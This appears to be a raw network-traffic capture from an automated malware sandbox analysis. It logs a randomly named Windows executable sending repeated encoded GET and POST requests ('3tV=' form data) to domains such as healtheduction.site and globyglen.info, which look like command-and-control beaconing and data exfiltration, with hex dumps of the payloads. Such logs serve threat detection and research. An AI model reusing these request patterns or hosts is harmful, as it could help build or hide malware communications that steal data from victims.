                                                              Sep 12, 2024 15:08:08.300906897 CEST431OUTGET /n3rq/?3tV=AokcV8lrD1iGOQWcBcmCrANBpf6sr5VfHV9HQUhaLRmf3Oh9ttLkjbrN5cmv13PiDvU4asCjKcP/FjbrfTOvR8dEp5E+Erc+ELSxl31AK9blM+O7DS4CIrs=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.justlivn.net
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:08:08.786214113 CEST208INHTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Thu, 12 Sep 2024 13:08:08 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Raw: 42 72 61 6e 64 20 50 61 67 65 20 43 75 73 74 6f 6d 20 44 6f 6d 61 69 6e 73
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              41192.168.2.44978384.32.84.37805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:08:22.194998980 CEST713OUTPOST /2frz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.healtheduction.site
                                                              Origin: http://www.healtheduction.site
                                                              Referer: http://www.healtheduction.site/2frz/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 6f 2b 54 48 34 6b 77 49 4d 52 39 57 70 48 57 49 51 4f 4c 6b 41 75 56 47 4b 75 31 48 62 64 73 35 70 62 59 70 32 6d 42 78 31 30 32 61 4a 61 6f 76 71 41 4c 6d 47 51 4d 4d 65 48 48 4d 6b 70 43 72 6d 46 76 35 66 70 34 61 31 69 43 4d 39 77 53 45 71 2b 47 7a 4e 39 33 48 63 66 46 46 51 41 76 31 38 5a 58 66 41 7a 63 5a 2b 78 2b 42 4e 64 67 53 71 68 75 58 71 75 76 70 4c 65 65 64 4d 76 62 32 7a 36 5a 43 67 66 43 47 38 32 32 67 69 62 33 4a 30 49 73 34 5a 6b 7a 76 46 33 68 36 75 47 72 5a 6d 56 61 63 59 5a 4c 58 54 70 57 72 56 43 54 70 53 41 36 56 4d 77 4e 53 4f 74 6a 68 59 69 67 69 4c 77 3d 3d
                                                              Data Ascii: 3tV=o+TH4kwIMR9WpHWIQOLkAuVGKu1Hbds5pbYp2mBx102aJaovqALmGQMMeHHMkpCrmFv5fp4a1iCM9wSEq+GzN93HcfFFQAv18ZXfAzcZ+x+BNdgSqhuXquvpLeedMvb2z6ZCgfCG822gib3J0Is4ZkzvF3h6uGrZmVacYZLXTpWrVCTpSA6VMwNSOtjhYigiLw==
                                                              Sep 12, 2024 15:08:22.878165960 CEST1232INHTTP/1.1 301 Moved Permanently
                                                              Server: hcdn
                                                              Date: Thu, 12 Sep 2024 13:08:22 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 795
                                                              Connection: close
                                                              location: https://www.healtheduction.site/2frz/
                                                              platform: hostinger
                                                              panel: hpanel
                                                              content-security-policy: upgrade-insecure-requests
                                                              alt-svc: h3=":443"; ma=86400
                                                              x-hcdn-request-id: 28e8f9bea0a6c943c856b91cf6684e21-bos-edge3
                                                              x-hcdn-cache-status: DYNAMIC
                                                              x-hcdn-upstream-rt: 0.235
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              42192.168.2.44978484.32.84.37805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:08:24.750397921 CEST733OUTPOST /2frz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.healtheduction.site
                                                              Origin: http://www.healtheduction.site
                                                              Referer: http://www.healtheduction.site/2frz/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 6f 2b 54 48 34 6b 77 49 4d 52 39 57 37 33 6d 49 54 74 6a 6b 46 4f 56 48 58 65 31 48 41 4e 73 39 70 62 55 70 32 6e 55 71 31 47 53 61 4f 2f 73 76 72 45 6e 6d 54 51 4d 4d 4b 58 48 51 70 4a 44 6e 6d 46 69 47 66 70 45 61 31 69 57 4d 39 31 57 45 71 4e 2b 77 66 39 33 46 56 2f 46 48 66 67 76 31 38 5a 58 66 41 33 38 7a 2b 78 47 42 4e 4d 51 53 72 46 79 59 30 65 76 71 62 2b 65 64 47 50 62 79 7a 36 5a 67 67 61 69 38 38 7a 36 67 69 62 48 4a 30 5a 73 37 58 55 7a 70 4c 58 67 75 74 44 61 4f 70 77 54 71 54 49 50 4c 4b 36 43 62 51 45 43 7a 44 78 62 43 65 77 70 68 54 71 71 56 56 68 64 72 51 77 79 67 62 71 56 78 68 4f 4d 75 34 6e 5a 37 39 56 4a 6e 37 6b 67 3d
                                                              Data Ascii: 3tV=o+TH4kwIMR9W73mITtjkFOVHXe1HANs9pbUp2nUq1GSaO/svrEnmTQMMKXHQpJDnmFiGfpEa1iWM91WEqN+wf93FV/FHfgv18ZXfA38z+xGBNMQSrFyY0evqb+edGPbyz6Zggai88z6gibHJ0Zs7XUzpLXgutDaOpwTqTIPLK6CbQECzDxbCewphTqqVVhdrQwygbqVxhOMu4nZ79VJn7kg=
                                                              Sep 12, 2024 15:08:25.443216085 CEST1232INHTTP/1.1 301 Moved Permanently
                                                              Server: hcdn
                                                              Date: Thu, 12 Sep 2024 13:08:25 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 795
                                                              Connection: close
                                                              location: https://www.healtheduction.site/2frz/
                                                              platform: hostinger
                                                              panel: hpanel
                                                              content-security-policy: upgrade-insecure-requests
                                                              alt-svc: h3=":443"; ma=86400
                                                              x-hcdn-request-id: 42f036d3443d12a4bcfb5817367a14be-bos-edge1
                                                              x-hcdn-cache-status: DYNAMIC
                                                              x-hcdn-upstream-rt: 0.231
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              43192.168.2.44978584.32.84.37805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:08:27.299057961 CEST10815OUTPOST /2frz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.healtheduction.site
                                                              Origin: http://www.healtheduction.site
                                                              Referer: http://www.healtheduction.site/2frz/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 6f 2b 54 48 34 6b 77 49 4d 52 39 57 37 33 6d 49 54 74 6a 6b 46 4f 56 48 58 65 31 48 41 4e 73 39 70 62 55 70 32 6e 55 71 31 47 61 61 4f 4e 6b 76 71 6c 6e 6d 56 67 4d 4d 4a 58 48 41 70 4a 43 39 6d 47 53 4b 66 70 49 6b 31 68 75 4d 39 58 65 45 73 38 2b 77 46 74 33 46 58 2f 46 43 51 41 76 61 38 5a 6e 68 41 7a 59 7a 2b 78 47 42 4e 50 59 53 2f 68 75 59 32 65 76 70 4c 65 65 72 4d 76 62 4f 7a 36 52 61 67 61 6e 42 2f 48 47 67 6a 37 58 4a 6e 37 45 37 56 30 7a 72 47 33 67 6d 74 44 66 4a 70 77 6e 63 54 49 37 78 4b 37 36 62 53 77 69 6b 58 45 37 74 66 69 31 38 48 64 61 74 55 54 42 61 62 43 2b 50 4c 71 70 6f 31 66 73 37 37 6c 49 49 68 31 68 74 76 77 75 38 49 4e 68 66 34 76 70 4a 46 4b 6c 5a 45 6c 73 68 4e 6b 34 6e 32 64 61 2f 44 6c 74 32 4b 73 54 31 2f 71 6b 73 65 78 6d 6e 63 52 62 63 56 46 45 2f 59 69 74 71 59 4d 73 35 2b 32 38 35 63 62 45 38 5a 5a 4a 37 4d 46 75 53 35 72 78 34 62 57 34 6d 76 48 72 49 64 6b 72 6c 45 4a 64 44 49 72 66 6b 6c 49 5a 50 47 4f 49 46 66 6a 47 32 41 69 2f 4a 75 78 33 6f 48 48 [TRUNCATED]
                                                              Data Ascii: 3tV=o+TH4kwIMR9W73mITtjkFOVHXe1HANs9pbUp2nUq1GaaONkvqlnmVgMMJXHApJC9mGSKfpIk1huM9XeEs8+wFt3FX/FCQAva8ZnhAzYz+xGBNPYS/huY2evpLeerMvbOz6RaganB/HGgj7XJn7E7V0zrG3gmtDfJpwncTI7xK76bSwikXE7tfi18HdatUTBabC+PLqpo1fs77lIIh1htvwu8INhf4vpJFKlZElshNk4n2da/Dlt2KsT1/qksexmncRbcVFE/YitqYMs5+285cbE8ZZJ7MFuS5rx4bW4mvHrIdkrlEJdDIrfklIZPGOIFfjG2Ai/Jux3oHHXgAhSsv/8bEgJ8THOMBcPUz/NakTYMNPJgBZ4/mszEMDHNsyEA2Y4XH1ODiUBkfk1Z86jtmoSqFRDtthCg5xpam36z/7ZpJrpexV/VFaNh8oe30/prBZBEW8hq4uiO4huJbEJ2f3tsNeDNmZtY9YY3kR1izEUsSCEpQdB7n25obeENQQCyrGgANA/wOQ+2D7ZylgVH53A3hMrZf/7X9XRxly6k2GIda9OctIj7i+Dm9rqGoKb5OYB5mhfDCU/yV0UxwPozA01VcmIblXMEzN9AsFlAXGsxSdlzAfSBxs2uYHvJiPv73A/qPxJgZW6WhdR5ongx+ppTIBrQ88cGF7C8yyC5zlZHwoAghwWEA0rvvW1SNceljTLCgdrSRIJlE9Po6vgekW0yrblm9t0NCAaDyJW7gI0tiL5abJaA1CaT49FRGhrHg/f/CYDqdN3l0JyEFjQnlL1D6DV0qGaxOKomeoEADeFFNVh4uKlkn66+W5Udt98Mp0jQZRu3hX0naSTUI1IFhTVPT71eSU1H8A9UZdxjAVCF+GbRdCe6THZbQA4CToCyVdJZBLcXS8IKxhGRYnlEj45Ts5J6X/AP/fmY1nIYIsg9YhrPgIHLfWPAq1+HpCuFJ3rcIfMu23Bukcog64pT//4I1E/M4tUNBskpOmn1kOMiaNCo [TRUNCATED]
                                                              Sep 12, 2024 15:08:27.981729031 CEST1232INHTTP/1.1 301 Moved Permanently
                                                              Server: hcdn
                                                              Date: Thu, 12 Sep 2024 13:08:27 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 795
                                                              Connection: close
                                                              location: https://www.healtheduction.site/2frz/
                                                              platform: hostinger
                                                              panel: hpanel
                                                              content-security-policy: upgrade-insecure-requests
                                                              alt-svc: h3=":443"; ma=86400
                                                              x-hcdn-request-id: 0e436f4ac93e9a39a6da3d7deb691ac8-bos-edge1
                                                              x-hcdn-cache-status: DYNAMIC
                                                              x-hcdn-upstream-rt: 0.232
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              44192.168.2.44978684.32.84.37805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:08:29.899676085 CEST438OUTGET /2frz/?3tV=l87n7Q89KFkj22mcQvGyKsY8DOdSYtwW2ZIksm0w5n2yQMdP8QPDEmc5KUTMu6S9hUr3H6R86Tmthm+6q52UOZ+nCsRLRXiC8/ThNXsRz23FX+gx8VT4y+4=&IhkTb=xPfHG0o8kZI8 HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Connection: close
                                                              Host: www.healtheduction.site
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Sep 12, 2024 15:08:30.548763037 CEST1236INHTTP/1.1 301 Moved Permanently
                                                              Server: hcdn
                                                              Date: Thu, 12 Sep 2024 13:08:30 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 795
                                                              Connection: close
                                                              location: https://www.healtheduction.site/2frz/?3tV=l87n7Q89KFkj22mcQvGyKsY8DOdSYtwW2ZIksm0w5n2yQMdP8QPDEmc5KUTMu6S9hUr3H6R86Tmthm+6q52UOZ+nCsRLRXiC8/ThNXsRz23FX+gx8VT4y+4=&IhkTb=xPfHG0o8kZI8
                                                              platform: hostinger
                                                              panel: hpanel
                                                              content-security-policy: upgrade-insecure-requests
                                                              alt-svc: h3=":443"; ma=86400
                                                              x-hcdn-request-id: f99ab451c1fed9ef1028618c9f492bd3-bos-edge3
                                                              x-hcdn-cache-status: MISS
                                                              x-hcdn-upstream-rt: 0.234
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 styl
                                                              Sep 12, 2024 15:08:30.548953056 CEST137INData Raw: 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20
                                                              Data Ascii: e="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              45192.168.2.4497873.33.130.190805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:08:35.725043058 CEST698OUTPOST /tni7/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 200
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.globyglen.info
                                                              Origin: http://www.globyglen.info
                                                              Referer: http://www.globyglen.info/tni7/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 43 67 50 56 56 72 53 6f 2f 64 57 64 43 71 53 71 31 79 67 39 4a 45 6b 4a 42 46 32 6f 45 67 66 53 64 70 56 57 6b 68 4c 38 50 6e 77 74 6b 43 67 52 49 52 74 48 71 6e 72 50 35 57 2f 30 69 65 39 47 54 6a 53 7a 48 64 30 31 66 4c 34 4f 4f 55 56 38 79 5a 61 30 46 2f 47 58 52 50 56 62 50 51 50 45 6f 32 79 7a 4d 30 57 76 53 54 6c 6e 49 74 57 2b 6f 76 6d 44 63 6a 37 71 64 6c 4f 38 4a 68 46 41 2b 30 36 47 6e 38 6c 31 50 6a 71 39 42 56 4d 45 7a 76 45 63 35 47 68 59 68 38 4f 38 54 43 57 6a 44 2b 2f 44 2b 48 33 30 43 44 78 79 76 71 6e 71 44 47 6b 61 53 35 4f 53 59 6b 33 34 76 35 46 4c 54 51 3d 3d
                                                              Data Ascii: 3tV=CgPVVrSo/dWdCqSq1yg9JEkJBF2oEgfSdpVWkhL8PnwtkCgRIRtHqnrP5W/0ie9GTjSzHd01fL4OOUV8yZa0F/GXRPVbPQPEo2yzM0WvSTlnItW+ovmDcj7qdlO8JhFA+06Gn8l1Pjq9BVMEzvEc5GhYh8O8TCWjD+/D+H30CDxyvqnqDGkaS5OSYk34v5FLTQ==


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              46192.168.2.4497883.33.130.190805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:08:38.280320883 CEST718OUTPOST /tni7/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 220
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.globyglen.info
                                                              Origin: http://www.globyglen.info
                                                              Referer: http://www.globyglen.info/tni7/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
                                                              Data Raw: 33 74 56 3d 43 67 50 56 56 72 53 6f 2f 64 57 64 42 4b 43 71 33 54 67 39 50 6b 6b 57 63 31 32 6f 64 51 65 62 64 70 52 57 6b 67 50 73 4d 56 55 74 6c 6e 4d 52 47 31 78 48 70 6e 72 50 32 32 2f 39 73 2b 39 7a 54 6a 75 42 48 63 59 31 66 4c 73 4f 4f 52 35 38 79 71 69 33 66 50 48 78 46 2f 56 56 52 67 50 45 6f 32 79 7a 4d 33 71 52 53 54 39 6e 49 64 47 2b 36 39 65 45 52 44 37 70 4e 31 4f 38 4e 68 46 62 2b 30 36 34 6e 34 39 66 50 68 53 39 42 58 6b 45 7a 2b 45 44 77 47 68 65 2f 38 50 70 53 54 72 30 46 4f 4f 39 33 47 7a 77 4e 7a 4a 42 75 73 32 77 53 33 46 4e 41 35 71 68 46 6a 2b 4d 69 36 34 43 49 58 61 6e 6c 33 64 6a 62 42 5a 59 6d 5a 48 69 66 4b 4c 4c 54 71 55 3d
                                                              Data Ascii: 3tV=CgPVVrSo/dWdBKCq3Tg9PkkWc12odQebdpRWkgPsMVUtlnMRG1xHpnrP22/9s+9zTjuBHcY1fLsOOR58yqi3fPHxF/VVRgPEo2yzM3qRST9nIdG+69eERD7pN1O8NhFb+064n49fPhS9BXkEz+EDwGhe/8PpSTr0FOO93GzwNzJBus2wS3FNA5qhFj+Mi64CIXanl3djbBZYmZHifKLLTqU=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              47192.168.2.4497893.33.130.190805084C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 12, 2024 15:08:40.824382067 CEST10800OUTPOST /tni7/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Cache-Control: no-cache
                                                              Content-Length: 10300
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Host: www.globyglen.info
                                                              Origin: http://www.globyglen.info
                                                              Referer: http://www.globyglen.info/tni7/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
